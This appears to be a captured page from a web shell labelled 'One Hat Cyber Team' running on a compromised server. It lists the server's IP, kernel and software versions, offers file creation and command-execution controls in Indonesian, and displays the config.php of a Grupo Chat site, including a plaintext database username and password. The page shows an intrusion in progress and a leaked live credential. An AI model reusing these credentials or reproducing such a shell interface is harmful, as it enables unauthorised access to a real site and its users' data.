One Hat Cyber Team
Your IP :
3.142.131.16
Server IP :
50.28.103.30
Server :
Linux host.jcukjv-lwsites.com 4.18.0-553.22.1.el8_10.x86_64 #1 SMP Tue Sep 24 05:16:59 EDT 2024 x86_64
Server Software :
nginx/1.24.0
PHP Version :
8.3.12
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
www
/
wwwroot
/
globify.live
/
include
/
Edit File:
config.php
<?php $config = new stdClass(); $config->app_name = 'Grupo Chat'; $config->app_version = '3.8.1'; $config->site_url = "http://localhost/grupo/"; $config->force_url = false; $config->force_https = false; $config->developer_mode = false; $config->csrf_token = false; $config->samesite_cookies = 'default'; $config->http_only_cookies = false; $config->cookie_domain = ""; $config->timezone = 'Asia/Kolkata'; $config->file_seperator = '-gr-'; $db_error_mode = PDO::ERRMODE_SILENT; if ($config->developer_mode) { $db_error_mode = PDO::ERRMODE_EXCEPTION; } $config->database = [ 'type' => 'mysql', 'host' => 'localhost', 'database' => 'globify', 'username' => 'globify', 'password' => 'eLAWRRxfbfRWApZJ', 'port' => '3306', 'prefix' => 'gr_', 'charset' => 'utf8mb4', 'collation' => 'utf8mb4_general_ci', 'logging' => false, 'error' => $db_error_mode, 'option' => [ PDO::ATTR_PERSISTENT => true ], ];
Simpan